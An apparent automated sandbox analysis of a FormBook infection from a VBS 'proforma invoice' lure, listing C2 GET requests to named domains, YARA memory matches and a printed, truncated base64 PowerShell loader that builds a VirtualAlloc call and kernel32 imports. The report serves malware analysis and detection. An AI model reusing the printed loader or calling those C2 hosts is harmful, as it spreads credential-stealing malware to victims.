Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=vE0t2WxjBi8H4KsoCXQPFaaEcnaL0cW4rsHN0mKSQSi6rgkDy1GsjEniIX065GWycDne&UlCp=CJEhZPH HTTP/1.1Host: www.vtubber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1740, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: ielowutil.exe PID: 8008, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Personaleg.ShellExecute Predelegat, Pseudogla & chr(34) & cowardli & chr(34), vbnullstring, vbnullstring, 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5200
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5200 Jump to behavior
Yara signature match
Source: Unclear Proforma Invoice.vbs, type: SAMPLE Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1740, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: ielowutil.exe PID: 8008, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0706EAF0 4_2_0706EAF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07ED3628 4_2_07ED3628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07ED360D 4_2_07ED360D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08560040 4_2_08560040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08560006 4_2_08560006
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92EE8 21_2_1EE92EE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF59ED2 21_2_1EF59ED2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF50EAD 21_2_1EF50EAD
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEE2E48 21_2_1EEE2E48
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC0E50 21_2_1EEC0E50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 21_2_1EEA6FE0
